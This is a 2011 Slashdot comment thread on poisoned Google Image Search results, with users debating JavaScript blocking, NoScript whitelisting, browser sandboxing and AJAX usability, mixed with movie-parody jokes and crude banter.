Poisoned Google Image Searches Becoming a Problem

Orome1 writes "If you are a regular user of Google's image search, you might have noticed that poisoned search results have practically become a common occurrence. Google has, of course, noticed this and does its best to mark the offending links as such, but they still have trouble when it comes to cleaning up its image search results."

im glad im not the only one

[metalmaster]

I was looking up images for a VP shunt when I came across a few poisoned links. I got scared for a minute because just hovering over the image triggered the payload for one of them

Re:im glad im not the only one

[WrongSizeGlass]

To protect myself against these poisoned image search results I make sure I always use Lynx when I search for images.

Re:im glad im not the only one

This is where I wish some of those old ASCII penisbird trolls would jump in

Re:im glad im not the only one

[Nimey]

lynx + zgv was how I used to view images on the Web about ten years ago. It worked surprisingly well, back before AJAX or Flash were used for navigation.

Re:im glad im not the only one

[lennier1]

Like ASCII Goatse?
http://www.nerdgranny.com/ascii-goatse/

Re:im glad im not the only one

[Alex+Belits]

lol penis birds X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Re:im glad im not the only one

[ae1294]

I was looking up images for a VP shunt when I came across a few poisoned links. I got scared for a minute because just hovering over the image triggered the payload for one of them

That's why I've spent years building up a tolerance to poison links...

Re:im glad im not the only one

[Rizimar]

I pretty fluent in JPEG myself, though I read the files in a hex editor. You get used to it. I...I don't even see the code. All I see is blonde, brunette, red-head.

Re:im glad im not the only one

Dread Pirate Google: All right. Where is the trojan? The battle of wits has begun. It ends when you decide and we both click, and find out who is right... and who is hacked.

Vizzini: But it's so simple. All I have to do is divine from what I know of you: are you the sort of man who would put the trojan into his own link or his enemy's? Now, a clever man would put the trojan into his own link, because he would know that only a great fool would click on what he was given. I am not a great fool, so I can clearly not choose the link in front of you. But you must have known I was not a great fool, you would have counted on it, so I can clearly not choose the link in front of me.

Dread Pirate Google: You've made your decision then?

Vizzini: Not remotely. Because Zeus comes from Eastern Europe, as everyone knows, and Eastern Europe is entirely peopled with criminals, and criminals are used to having people not trust them, as you are not trusted by me, so I can clearly not choose the link in front of you.

Dread Pirate Google: Truly, you have a dizzying intellect.

Vizzini: Wait till I get going! Where was I?

Dread Pirate Google: Eastern Europe.

Vizzini: Yes, Eastern Europe. And you must have suspected I would have known the trojan's origin, so I can clearly not choose the link in front of me.

Dread Pirate Google: You're just stalling now.

Vizzini: You'd like to think that, wouldn't you? You've beaten my firewall, which means you're exceptionally strong, so you could've put the trojan in your own link, trusting on your strength to save you, so I can clearly not choose the link in front of you. But, you've also bested my antivirus, which means you must have studied, and in studying you must have learned that root is hackable, so you would have put the trojan as far from yourself as possible, so I can clearly not choose the link in front of me.

Dread Pirate Google: You're trying to phish me into giving away something. It won't work.

Vizzini: It has worked! You've given everything away! I know where the trojan is!

Dread Pirate Google: Then make your choice.

Vizzini: I will, and I choose-- What in the world can that be?

Dread Pirate Google: What? Where? I don't see anything.

Vizzini:Well, I- I could have sworn I saw something. No matter.

Dread Pirate Google: What's so funny?

Vizzini: I'll tell you in a minute. First, let's click. Me on my link, and you on yours.

(They both click.)

Dread Pirate Google: You guessed wrong.

Vizzini: You only think I guessed wrong! That's what's so funny! I switched links when your back was turned! Ha ha! You fool! You fell victim to one of the classic blunders! The most famous is never get involved in a land war in Asia, but only slightly less well-known is this: never go in against a Sicilian when pwnage is on the line!! Ha ha ha ha ha ha ha!! Ha ha ha ha ha ha ha!! Ha ha ha--NO CARRIER

Re:im glad im not the only one

[Lillebo]

Conversation inspired by The Princess Bride: http://en.wikipedia.org/wiki/The_Princess_Bride

Re:im glad im not the only one

I have to say, google has become more and more worthless in the past 2 years without using advanced search queries.
Simple searches almost always return 6000000 garbage results, many appearing on the first page of search results.
There are so many people trying to get rich quick with bullshit websites (the irony, google caused this mess, thee sites in question are all
competing for adword/adsense pennies) the www has become a huge stinking trash pile.
I feel bad for those that can't tell the difference or don't know how to do complicated searches that return actual useful results.
And if one more query returns answers.yahoo.com and that mess of uninformed idiots, I'll I'll I'll stutter and turn off my internet.

Re:im glad im not the only one

Bravo, Lillebo. Bravo. Please let me know what movie "What is the air-speed velocity of an unladen swallow?" comes from. I'm also curious about "No, I am your father", "Frankly, my dear, I don't give a damn" and who the fuck said "You've got to ask yourself a question: Do I feel lucky? Well, do ya, PUNK?".

Re:im glad im not the only one

[perryizgr8]

what does poisoned even mean here?

Re:im glad im not the only one

*slow clap*

Re:im glad im not the only one

[geminidomino]

Oh gods, I should NOT be laughing that hard at 3 AM...

That was great.

Re:im glad im not the only one

[Lost+Race]

Good question. And what does "triggered the payload" mean?

Re:im glad im not the only one

[MMMDI]

Even better question. And what is this "Google" they are speaking of?

Re:im glad im not the only one

[jimicus]

Click on the link and abracadabra, as if by magic your computer is infected with malware.

I had one yesterday through stumbleupon - it showed a webpage claiming to scan for (and naturally find) malware and at the same time triggered the download of something calling itself anti_malware.zip. I don't know if it would have exploited a browser hole to install itself had I been running Windows or if it was simply banking on me running the download.

Re:im glad im not the only one

[hairyfeet]

So NoScript FTW then? Has anybody come up with a NoScript style tool for Chromium BTW? Because on the one hand with FF devs refusing to support low rights mode in modern Windows it makes FF worse than Chromium, but on the other hand having NoScript makes it safer to actually have a readable page without the "all or nothing" approach of other browsers.

So I guess what I'm trying to figure out is this: Is it safer to run Chromium in low rights mode, or to have FF running in full rights but have NoScript? If anyone here has a clue please chime in, as I don't have any spare boxes capable of running Win 7 ATM so I have no way to really test the theory. It would be interesting to know which is safer: FF with NoScript or Chromium low rights mode and sandboxing.

Although if they don't fix the damned memory leaks and CPU spikes I'll have to switch everyone over to Comodo Dragon (Chromium based) anyway as I'm already running into customers that are having trouble with FF 4. But if anybody knows which sitch is the safer way to go please let me know. Anything that can give my customers and family a safer machine is always of the good.

Re:im glad im not the only one

For now I will go with Chrome in low rights (Vista or Win 7). I don't know about Chromium as I only run the Google Chrome distribution, but I would guess they are the same. As you are probably aware, most exploits lately use some Flash vulnerability or Adobe Reader vulnerability. These are mitigated by the low rights (protected mode).

Re:im glad im not the only one

I myself have spent many years building up an immunity to these poisons.

Re:im glad im not the only one

[Mana+Mana]

> lynx + zgv was how I used to view images on the Web

^ For pussies. telnet is for men.

Re:im glad im not the only one

[Methuseus]

Well, I don't know which movie the last one is from. I believe it's a Clint Eastwood (or whatever the fuck his name is) movie, but dunno which one. Don't eve know the names of any. I can't stand to watch any of them to be honest.

Re:im glad im not the only one

"Poisoned" means instead of hot naked chicks, you get hot naked trannies.

"Triggered the payload" means you fapped and came anyway,

HTH.

Re:im glad im not the only one

[jgagnon]

Bah. Saving multiple messages from Usenet, concatenating them, and then using uudecode FTW. :p

web 101: don't run unknown javascripts

From TFA: "it displays another script - this time it's a JavaScript one - that redirects the browser to another compromised site that serves malware."

By 2011, it should be considered "web 101" to not run javascripts unless you have a reason TO run them. Most people seem to just run any old javascripts by default, without having the first clue what it might be doing. There can't be much debate that it's a stupid course of action, given how many people's machines are jacked by exactly that attack vector (albeit possibly using another as well).

Yeah, yeah, I know, you need javascript for your bank. That's great: whitelist your damn bank. But run only javascripts on your *whitelist*, not any thing any random yahoo from a site you've never heard of before wants you to run. Would you treat your physical possessions that way? Would you let a drug gang in eastern europe borrow your car with your permission? If not, why would you allow them to use your computer?

I swear that the reason I haven't had a malware in my entire PC using history, and others seem to have them on a weekly or monthly basis, is because I don't completely shut off my brain once the words "... on the computer" appear in a sentence.

Re:web 101: don't run unknown javascripts

"Most people seem to just run any old javascripts by default"

Maybe it's because Javascripts run by default, and most people use default settings for everything. My grandma isn't zer0cool.

Re:web 101: don't run unknown javascripts

[Frosty+Piss]

By 2011, it should be considered "web 101" to not run javascripts unless you have a reason TO run them. Most people seem to just run any old javascripts by default...

This is not going to happen. Many major websites, many of the highest traffic websites involve hundreds of JS scripts to make a single page function. Web 2.0 and all...

The *average non-techie web surfer* is simply NOT going to turn off JS.

Will not happen... So, it's not realistic or productive to waste time discussing such an option.

Sad, but true.

Re:web 101: don't run unknown javascripts

I see the point, but I'm not so sure I see it like that. I keep JS off by default, only whitelisting a few sites (and not all their XSS stuff), and everything is basically OK as far as I can tell. Have I seen a few things break? Yeah, but usually not anything I cared much about - just random domains that for all I know really were trying to serve malware. The major sites I use either work fine with no JS at all, or only need one or two to run. JS is not as indispensable as people think. 95% of what it appears to be used for is just to track your ass, and who needs that? I'd put it at about: 95%: tracking your ass. 4%: real stuff. 1%: serving malware.

Plus, if people started doing this en-mass (or browser vendors set the default that way), there would be considerable pressure on sites to work OK without all that shit.

Re:web 101: don't run unknown javascripts

[blindseer]

It's 2011, there should not be anything a Javascript can do that is harmful to your computer.

Re:web 101: don't run unknown javascripts

So this argues that the default is backwards, not that the GP's point is wrong.

Re:web 101: don't run unknown javascripts

"there should not be anything a Javascript can do that is harmful to your computer."

You are probably correct, but since that is not the present state of affairs, the best way to deal with the actual reality appears to be not running JS by default. At such time that your wish becomes reality, one can re-evaluate. For now, wishing a thing true does not make it so. Sticking one's head in the sand about it only makes that person vulnerable.

The difference between a victim and a non-victim is often not who was targeted, but who took steps to avoid being that victim. It doesn't absolve the attackers of responsibility, it just means that it's stupid to walk down a dark alley in a run down neighbourhood flashing the bling and carrying a wallet with $1000 in it.

Re:web 101: don't run unknown javascripts

As a professional web developer, we often write code that expects Javascript to work on our sites, because noone ever turns it off. We have some very high traffic sites, and outside of web crawlers, I don't believe we've seen it blocked, ever.

Re:web 101: don't run unknown javascripts

This is not going to happen. Many major websites, many of the highest traffic websites involve hundreds of JS scripts to make a single page function. Web 2.0 and all...

Ironic, given that Google recently (this month) just changed its behavior to practically require Javashit.

Old hotness: (1) Google "foo". (2) Click "Images" tab at top of screen for a GIS for "foo".

New and busted: (1) Google "foo". (2) Click "Images" tab at top of screen for... "Your search - foo - did not match any documents." (3) curse, click "Images" tab again - to go to http://www.google.com/imghp?hl=en&tab=ii, and (4) have to type "foo" again in order to GIS "foo". (Or remember to start at images.google.com, which is an issue when you might not be sure which terms to use when searching for the image in the first place)

Turn Javashit on, and clicking the tab works just fine... but whatever Google changed broke the non-Javashit version of GIS.

Sorta like last month - maps.google.com is an AJAX app, so it's reasonable for it to require Javascript. But it used to work fine without cookies enabled. Now, it requires both Javascript and cookies. Interesting.

Just tested/confirmed both of these on Firefox 3.6.16.

What Facebook does overtly, Google does by benign neglect and failure to regression-test. What's next? Google services simply stop working for Firefox and require Chrome?

Re:web 101: don't run unknown javascripts

[makubesu]

Only run javascript on approved sites? I've tried this before, and to be honest it makes using the internet a pain. Instead, I prefer to, oh you know, not run an operating system that is susceptible to malware attacks.

Re:web 101: don't run unknown javascripts

[WuphonsReach]

This is not going to happen. Many major websites, many of the highest traffic websites involve hundreds of JS scripts to make a single page function. Web 2.0 and all...

The *average non-techie web surfer* is simply NOT going to turn off JS.

They will after their machine has to be taken into the shop again for maintenance due to being infected by drive-by exploits like this.

I've converted quite a few non-technical users over to using Firefox + FlashBlock + NoScript over the past few years. The results is that they whitelist the handful of sites that they care about, temporary whitelist for sites that are a one-time visit, and everything else stays blocked.

It's not a perfect solution, but the result for them is none of them have been infected since they switched. Cuts their risk factor by probably at least one or two orders of magnitude. Combine that with not letting them run as an admin user on XP, and even if the machine is infected, odds are 10:1 that it will only manage to infect the user's profile instead of the entire machine.

Re:web 101: don't run unknown javascripts

[AsmordeanX]

I tried running with Javascript disabled. Five years ago you could get away with it. Now so many sites, especially with jQuery being so pervasive, simply don't work with JS disabled or you get an ugly broken thing.

I hear the claim, "Well you can run it on trusted sites". What has the site done to earn my trust? Why couldn't a malicious site appear interesting enough to prompt you to turn JS on and thus be attacked. Only a little social engineering can defeat NoScript. Whitelisted sites can become compromised as well.

Re:web 101: don't run unknown javascripts

[Low+Ranked+Craig]

Uh, no. Javascript is required for a significant portion, I'd say most, of the high traffic sites out there. It is simply not feasible, or acceptable to suggest that all users disable a significant portion of the functionality of the web.

Re:web 101: don't run unknown javascripts

[Low+Ranked+Craig]

Why sad? THe ability to have portions of the page refresh without round-tripping to the server for a whole new page is only one of the highly useful functions provided by JS.

Re:web 101: don't run unknown javascripts

It is reality. Virtually all known (persistent) drive-by 'malware' infections are stopped either by plugin disabling or at the sandbox boundaries.

Re:web 101: don't run unknown javascripts

Firefox + FlashBlock + NoScript

What's the point? NoScript is FlashBlock and then some.

Re:web 101: don't run unknown javascripts

[Frosty+Piss]

They will after their machine has to be taken into the shop again for maintenance due to being infected by drive-by exploits like this.

You might think, but there is a lot to suggest that what you suppose is not the case.

The fact is, the average non-techie user values "interactive" over "secure". Those in the business of servicing PCs on the consumer level will tell you this.

Re:web 101: don't run unknown javascripts

> Why couldn't a malicious site appear interesting enough to prompt you to turn JS on and thus be attacked

The word was trusted, not "interesting".

My bank = trusted.
Random thing linked to from fark: interesting, but not trusted

Whitelist only trusted things. If it means you don't see some dancing walrus but your machine doesn't end up with a keylogger sending your bank password to Nigeria, that's probably an OK tradeoff for most people.

Re:web 101: don't run unknown javascripts

[Nyder]

It's 2011, there should not be anything a Javascript can do that is harmful to your computer.

It's 2011, where's my damn flying car?

Re:web 101: don't run unknown javascripts

[Culture20]

Even if the defaults are reversed, what is grandma going to do, vet the JS code for every script that wants to run?

Re:web 101: don't run unknown javascripts

[Tacvek]

The trouble is that you likely get a substantially degraded experience on some sites. Many well developed sites use AJAX to speed up navigation[1], falling back on a full request when JavaScript is disabled. Similarly many sites implement convince features like jquery-based auto-completion which help make the site easier/faster to use, but again the site continues to function even with JavaScript turned off. You likely never even realize that you are getting a degraded experience because the site did not completely break.

That is a large part of the reason I actively do not recommend NoScript or similar solutions, favoring blacklisting known bothersome scripts, and using sadboxes and equivalent to guard against the unknown.

[1] You only need to download the changed portion, and browsers can update a page in place faster than re-rendering the whole page.

Re:web 101: don't run unknown javascripts

[93+Escort+Wagon]

Even if the defaults are reversed, what is grandma going to do, vet the JS code for every script that wants to run?

This is Slashdot - our posts are meant to demonstrate how 1337 we are, not an understanding of how the world actually works.

Re:web 101: don't run unknown javascripts

[93+Escort+Wagon]

It's 2011, there should not be anything a Javascript can do that is harmful to your computer.

It's 2011, where's my damn flying car?

It's held up in pre-production until they can fix a persistent Javascript bug.

Re:web 101: don't run unknown javascripts

[Undead+Waffle]

Why sad? THe ability to have portions of the page refresh without round-tripping to the server for a whole new page is only one of the highly useful functions provided by JS.

It's useful when used correctly. But when all of the links are JS and I can no longer middle click to open in new window I get annoyed.

Re:web 101: don't run unknown javascripts

[Culture20]

As a professional web developer, we often write code that expects Javascript to work on our sites

You're the kind of stupid that makes a website that's just one big flash object with no links to non-flash content. As much as I hate to hate on them, Toys for Bob has been the same kind of stupid for almost a decade, so at least you're in good company.

Re:web 101: don't run unknown javascripts

You havn't looked very hard then. It may not be a huge number of people blocking it, but we do exist. Perhaps people get disgusted with your page which depends on java that they go elsewhere.

It may not be a huge deal now but eventually enough people will block by default that it will affect your page views, and then you'll be redesigning your page to allow for no java. Have fun doing your job twice asshole.

Re:web 101: don't run unknown javascripts

[0123456]

We have some very high traffic sites, and outside of web crawlers, I don't believe we've seen it blocked, ever.

NoScript claims to have downloaded 84,000,000 times, so I can only presume that people running it are unlikely to visit your sites.

Re:web 101: don't run unknown javascripts

[0123456]

It's useful when used correctly. But when all of the links are JS and I can no longer middle click to open in new window I get annoyed.

And I really hate sites which break the back button because the site is all Javashit. Hotmail is a glaring example.

Re:web 101: don't run unknown javascripts

[0123456]

If it means you don't see some dancing walrus but your machine doesn't end up with a keylogger sending your bank password to Nigeria, that's probably an OK tradeoff for most people.

Sadly, I don't think you know 'most people'.

Re:web 101: don't run unknown javascripts

[Frosty+Piss]

the best way to deal with the actual reality appears to be not running JS by default

And Homer Simpson once said...

...I'm the magical man, from Happy Land, who lives in a gumdrop house on Lolly Pop Lane!!!!

Frankly, those who take your view might as well simply run Lynx. Or skip surfing the web.

Re:web 101: don't run unknown javascripts

[RobbieThe1st]

Course, near as I can tell, computers these days can re-render the page fast enough that it doesn't matter: It's internet connection speed and latency that's important.
I, for one, hate ajax crap: It's almost always slower for me(due to them always using multiple requests, across multiple servers usually) than a single, straight HTML page with everything else being cached. Of course, the ajax'd page loading new ad-code may have something to do with it -- Turning on NoScript speeds up some pages loading by 10x at least!

Re:web 101: don't run unknown javascripts

Hopefully someone will mod you TROLL. Or MORON.

Re:web 101: don't run unknown javascripts

You can fix this by adding "&gbv=1" to your search search string. If you want it as a seach plugin save http://pastebin.com/GswQX4V5 as an xml file in your searchplugins folder.

Re:web 101: don't run unknown javascripts

[Culture20]

Hopefully someone will mod you TROLL. Or MORON.

Why? Have I been Wooshed? I had to inform our own web devs that our website doesn't work without flash and JS, and they didn't see the problem either. It's as bad as a sysadmin suggesting RAID0 because he's never seen a drive die. Maybe troll for the TFB comment? I notified them of their error in 2002 when they changed to the big flash object (back when few people used flash), now that flash is being blocked in companies and iP[od/ad/hone]s don't have flash, it still boggles me why they don't have at least a simple "here's who we are" that's just simple html.

Re:web 101: don't run unknown javascripts

[jabberw0k]

Indeed. This whole article confuses me. I have been doing web development since the 1990s and the whole point of Javascript was that it cannot cause a program to be run or installed on your computer... otherwise the web browser is insecure. If Javascript code can permit code to run on your computer, that would be a show-stopping browser bug! If that is true, then the only way to prevent this is to stop using that broken browser entirely. But that cannot be the case, can it?

I find it hard to understand why this whole article is a problem...

Re:web 101: don't run unknown javascripts

[brentrad]

Tried just what you suggested in Google Image Search (in Firefox 4.0.1). Javascript blocked with NoScript: worked. Javescript not blocked: worked. Might want to check it again, or upgrade to 4.0.

Re:web 101: don't run unknown javascripts

[interkin3tic]

Only a little social engineering can defeat NoScript. Whitelisted sites can become compromised as well.

But your whitelisted sites -should- have a decreased chance of being compromised and infected. Thus it is safer than allowing everything, and more functional than blocking everything.

Honestly I can't understand people who act as if NoScript is a huge security risk or the devil when most people, including myself, would choose "allow all javascripts" if their only options were all or nothing.

Re:web 101: don't run unknown javascripts

[brentrad]

I run with NoScript all the time, it's not really a problem if you're a geek. You need to make a judgement about the site you are visiting. Does it look a little sketchy, and was it just some joke link someone sent me? It stays blacklisted, and if the site doesn't work, well then I'll live without viewing it. Is it the front page of the New York Times? Well you can probably safely whitelist the main domain - if the page still doesn't work, whitelist each domain selectively until the page works - but don't whitelist anything that looks like it's from a web advertising company. It's not really that difficult, and it's been ages since I've gotten a virus, even though I visit many sketchy-looking sites. An added bonus is I never see those highly-annoying javascript ads that pop up off your screen or are animated.

That said, I don't enable NoScript on my wife's computer. She's not that geeky, and it would piss her off to have to whitelist every single site (she also doesn't have a whole lot of patience.) Just make sure they have a good virus and malware realtime scanner (Microsoft Security Essentials is a good, lightweight, free one), and most importantly have them run Firefox, and they'll be fine.

Re:web 101: don't run unknown javascripts

[toygeek]

Yes, I will tell you this. Indeed, people want their computer to be like a microwave. They don't care how it works and as long as it puts out hot food they're happy. I still get people running IE6 and 7 and Firefox 2.0. They don't give a hoot about security, and most of the time they have no idea what is secure and what isn't.

Drive by's are unavoidable, but with some education we help our customers keep from being infected.

Re:web 101: don't run unknown javascripts

Whitelist only trusted things. If it means you don't see some dancing walrus but your machine doesn't end up with a keylogger sending your bank password to Nigeria, that's probably an OK tradeoff for most people.

Where's teh dancing walrus? I the googled it on the internets, but all i gots wen I enterd my Pin wuz nuthin.

Re:web 101: don't run unknown javascripts

outside of web crawlers, I don't believe we've seen it blocked

And inside of a web crawler, it's too dark to read.

Re:web 101: don't run unknown javascripts

[Scarletdown]

Make use of Firefox's Prefbar. That has simple check boxes that you can click on when you need Javascript and Flash enabled. Otherwise, keep them turned off until needed.

Re:web 101: don't run unknown javascripts

I'm more interested in whether or not your grandmother might be Acid Burn.

Re:web 101: don't run unknown javascripts

... or take other protections.

I have javascript fully enabled. I also have AVG link-scanner fully enabled.

I did an image search on Google on the 2nd, and got no problems.

Re:web 101: don't run unknown javascripts

NoScript, the tin foil hat of 2010

seriously, there are ton of better ways of avoiding drive by attack by websites that are not shooting in your own browser foot.

Re:web 101: don't run unknown javascripts

[houghi]

The reason this is not the case is because the current ITers are the past script kiddies who LOVED to help out the neighbor and reinstall stuff. So WE trained the people that this was normal.

Ask a non-tech users and he will say it is normal that PCs get slower over time. "Normal" means here "To be expected".

I doubt many people say "I work in IT and will charge your the official amount I charge others, grandma." I do so by saying they should ask for support with their supplier. I then explain I offered the installation of Linux and if they are willing to do that, I will be their supplier and they can come to me.

Re:web 101: don't run unknown javascripts

[houghi]

So if I want to search images with Google, should I turn it off or on? Should Google be on my whitelist or not?

Re:web 101: don't run unknown javascripts

[jschottm]

First, flaws in the javascript engine are very often the source of buffer overflow attacks on the web browsers themselves. Perusing the security notes attached to changelogs would show you this.

Second, even within the allowed scope of the javascript specs, there's a *whole* lot of possibilities. Check out BeEF.

And third, and perhaps most important, once an attacker can run javascript on a system, they can find plug-ins and feed them content, and with as many of them out there as there are, chances are that the vast majority of users have at least one exploitable plug-in. It's generally not javascript itself that's the method of exploitation, just the handy way of finding and breaking something else.

Re:web 101: don't run unknown javascripts

The trouble is that you likely get a substantially degraded experience on some sites.

Ironically I consider all that AJAX-javascript-navigation stuff complete and utter bullshit. That right there degrades experience, not the other way around.

Before Javascript you could navigate sites in a "standardised" way, i.e. open links in tabs, use back and forward buttons and so on. All sites worked the same. Javascript broke that. Now sites have to reimplement this functionality in their own unusual way; most just don't do it. So navigation gets a lot harder WITH your fancy javascript.

I get it, as a developer you love fancy new technology. However as a visitor/customer it's a usability nightmare.

Re:web 101: don't run unknown javascripts

[houghi]

For Google Images, I now need to scroll all the way down, select to switch to basic version to get a somewhat usable way of viewing images.

And even though it would save time and bandwith on my side and about 5 minutes on their side to put it in a cookie, they decide that I must see it with a shitload of, well shit.

So now I am using Yahoo and as a result I use it for 'normal' searches as well.

Re:web 101: don't run unknown javascripts

What has the site done to earn my trust? Why couldn't a malicious site appear interesting enough to prompt you to turn JS on and thus be attacked. Only a little social engineering can defeat NoScript. Whitelisted sites can become compromised as well.

Trust is earned. It's a white list, not a black list - the purpose is not to keep it on and go, "AMG THIS SITE IS ANNOYING! OFF JS!" Your risk model is screwed if you can't figure out which sites to white list. "It's my bank. Should I trust them?" By that token, you should never go outside. Falling stuff and all.

Re:web 101: don't run unknown javascripts

[mr_lizard13]

Most people seem to just run any old javascripts by default, without having the first clue what it might be doing.

Most people don't, and never will, understand what JavaScript even is. They're not stupid people, they're just ordinary people.

Re:web 101: don't run unknown javascripts

[mikael_j]

If the head honchos say "we talked to marketing, they want widget foo to do thing bar when the user hovers his mouse pointer over it" then most of the time the devs can choose between "just do it" even if it means breaking things for those who don't have JS activated or disciplinary action.

It basically boils down to "It's not your website, it's ours, and we want shiny javascript everywhere, now implement it!". And yeah, I'm not a big fan of using JS unless absolutely necessary to get the desired results, but sometimes you have to.

Re:web 101: don't run unknown javascripts

[mikael_j]

How are those 84 million downloads counted? If they count upgrades then my netbook alone is probably responsible for about a dozen of them (I have to different Firefox setups on it, one "regular" and one that's locked down and running NoScript, AdBlock+ and a couple of other add-ons)...

Re:web 101: don't run unknown javascripts

[meatron]

Mind to elaborate which? Myself, I use mainly opera with java disabled by default and enable it only on sites I need. But what are the alternatives for noscript on ff?

Re:web 101: don't run unknown javascripts

[Waccoon]

Because browsers allow 3rd party Javascript to run as if it were 1st party. This makes advertisers happy.

I've been complaining about this for years, but so long as the new economy demands that browsers be supported through sponsorships and ads, security just won't become a priority.

Hell, reading a PDF can infect your PC with a virus? I've got a great idea... let's build a PDF reader right into the web browser, and for bonus point, you can't disable it. It's okay, we built a sandbox for it, and made JavaScript twice as fast for good measure. Oh, but we still won't include support for [insert FOSS codec of choice here] because it will make the browser too bloated.

Re:web 101: don't run unknown javascripts

[jimicus]

Because the very act of surfing the web is - from a security perspective - probably one of the most stupid things to have happened in the whole of computer history.

And I'm not exaggerating.

The first thing anyone who gives a damn about IT security learns is "don't open any old random garbage". How important this rule is (and how easily it's forgotten) was first brought home with things like ILOVEYOU - and that was 11 years ago, FFS. As a result, mail systems have been getting ever more paranoid about accepting executables - it's quite awkward to even successfully receive an executable in Outlook today, and that's assuming they've not been blocked at the mail server.

While this has been going on, web browsers and their plugins have been merrily gaining more and more functionality and more and more potential for exploits of more-or-less exactly the same type. But they're slightly worse. With email, most modern mail applications don't run any active content that's likely to cause a problem until you explicitly tell them to. Web browsers run it as soon as the page loads.

So we now have millions of people worldwide who are actively using a tool which - by design - downloads and runs random code from anywhere in the world with little or no confirming that one would want to - or indeed that it would be sensible to. At best you have something like Safari's "Warning, this site may damage your computer" page - but we already know that such warnings are fairly useless because people have been conditioned to ignore them.

Re:web 101: don't run unknown javascripts

[fuzzix]

I prefer to, oh you know, not run an operating system that is susceptible to malware attacks.

HAHAHAHA!

Oh, you were being serious.

Re:web 101: don't run unknown javascripts

Then you really need to come out of the 90's. JS can direct you to a malicious site. The malicious site can use JS to display a fake virus warning and this tricks the user into downloading fake AV programs.

Re:web 101: don't run unknown javascripts

***By 2011, it should be considered "web 101" to not run javascripts unless you have a reason TO run them.***

Well yes. The problem is that a high percentage of web site designers seem not to be very good at their job. Even if their site consists entirely of text content and would be useful, reliable, safe, attractive, and likely to render correctly for all users if they used html and fed it through the W3C validator, they use javascript. Let's take the first four lines of a web page from www.slashdot.org.

Yes, it's the first four lines of THIS webpage.

Re:web 101: don't run unknown javascripts

Well, that's cute. Let's try it substituting square brackets for angle brackets

[!DOCTYPE html]
[html lang="en"]
[head]
[script id="before-content" type="text/javascript"]

Re:web 101: don't run unknown javascripts

Did you try it while logged in to a Google account? I'm guess you didn't and the original person reporting the issue probably was logged in. If you are logged in Google does a lot more script and their links do tracking stuff and are often a bunch of redirects.

Re:web 101: don't run unknown javascripts

[GIL_Dude]

The issue isn't always really that JS lets the baddies do anything to your machine directly. It is usually more that it allows them to do a redirect to a site that is serving an exploit kit with lots of nice exploits against browser objects that are usually auto-instantiating (for folks who aren't running a blocker or the like). Examples of common auto-instantiating objects would be Flash and Acrobat Reader. These can be exploited without anything visible showing to the user. Often, vulnerabilities in these programs are used to do nefarious things like install fake AV programs that render your machine mostly useless unless you pay. (They tend to intercept process start events and stop the programs from starting and display "infected" messages).

So, since the browser normally trusts and runs any JS referenced by the site - no matter what other site it comes from or redirects to, it is a problem.

Re:web 101: don't run unknown javascripts

[Teckla]

The fact is, the average non-techie user values "interactive" over "secure".

That's nonsense.

Average non-technical users value "secure" at least as much as they value "interactive". But they are not domain experts, much like average car drivers are not master mechanics.

They simply don't know what to look for, what to worry about, how to interpret so much geek-ese in their software. The true failing is with us software developers. We create confusing, overly technical and complex crap, and expect people should have to spend 90% of their waking lives understanding it in order to use it safely.

We should be delivering them safe-by-default products that Just Work, and when something out of the ordinary happens, we should make it easy for them to understand and make an informed choice. No, making them Google what's going on is not acceptable.

Re:web 101: don't run unknown javascripts

[Angostura]

You're the kind of stupid that makes a website that's just one big flash object with no links to non-flash content.

And you're the kind of person who defines everything in the universe as 'black' or 'white'

Re:web 101: don't run unknown javascripts

[Gumbercules!!]

Anyone up for the irony of complaining about AJAX scripting on Slashdot? Try viewing *this very site* with NoScript enabled and see how much fun it is...

Re:web 101: don't run unknown javascripts

[Tim+C]

Actually in a lot of cases the partial page loads are there more to help the server than the client; a heavily-hit site can reduce bandwidth usage and processing overhead by a substantial amount by only processing/transferring the relevant portions of a page. The fact that it also may improve the end user experience is a nice bonus rather than the primary consideration.

Re:web 101: don't run unknown javascripts

[Caetel]

Presumably the difference is that everybody uses PDFs and Javascript, but nobody uses [FOSS codec of choice], so there is greater value to the average user in including that former two rather than the latter.

Re:web 101: don't run unknown javascripts

[MstrFool]

Wow... I hadn't expected to see that referenced and adapted here. You, Sir or Madam, deserve a cookie for that. Hmm, though considering the topic, maybe a brownie...

Re:web 101: don't run unknown javascripts

[Paradise+Pete]

Wow... I hadn't expected to see that referenced and adapted here.

Maybe it just means we're old. :-)

Re:web 101: don't run unknown javascripts

[Tacvek]

My point exactly. I clicked the reply button, and the did not go to a new page. I can still scroll up or down to refer to other messages, even expanding the hidden ones, all without losing what I am currently typing, and without needing to use a second tab to compose the reply. While I detest some of the nasty bugs that were present when D2 and D3 were introduced, I still remember using D1, and this is still much better than that experience.

Re:web 101: don't run unknown javascripts

[Tacvek]

When AJAX is implemented properly, the back/forward buttons can still work, and you can open links in new tabs just like normal. Even bookmarking still works properly. I'll admit that many sites do things wrong. I would not object to blacklisting JavaScript on such a site if they were written to still work without JavaScript enabled. But there are sites that get it right.

For example Gmail gets it more or less right. The back and forward buttons do the right thing, and you can right click on the links and open them in a new tab. The only thing I would complain about is that messages listed in list are not actually links. You can open them in a new foreground tab by holding control when you click them, but there currently is no way to pen them in a background tab.

However, in exchange for that it takes noticeably less time to open a message vs the basic html version of Gmail. You get new capabilities that are not possible with AJAX, such as having the inbox update automatically, without having a meta-refresh tag which would be irritating when scrolling through the list of messages. or being able to drag a message to a label to remove the inbox label, and add the one I dragged them to.

Re:web 101: don't run unknown javascripts

[lennier]

Because browsers allow 3rd party Javascript to run as if it were 1st party.

But why does even "1st party" Javascript have the ability to cause a program to be run or installed on your computer? My computer isn't a DOM document.

Re:web 101: don't run unknown javascripts

[Waccoon]

Well, that's more of a problem with the browser's security policies.

No script should be able to call events that go outside of its containing context (if you want to open or close a "window", it had better be affecting a frame within the current window, thank you). Creating calls like "window.open" and attaching them to JavaScript was a really stupid idea from the start. That's the fault of the web browser developers. If done right, JavaScript, DOM, and whatever browsers want to use wouldn't be a big deal.

The real problem is that JavaScript basically runs in one giant address space, so any JavaScript imported from 3rd party web sites have the same level of access as 1st party JavaScript. This is incredibly stupid. A lot of web sites outsource to ad agencies, or use more than one ad agency, so keeping track of good/bad agencies is a major challenge. Not like you can trust advertisers who have the chance to leech your data to improve their service, either. Once their code is included in your web page, they can do pretty much anything with your customer's data, cookies, keystrokes, etc. It's a security nightmare. Advertising is all about collecting and serving information. What could possibly go wrong?

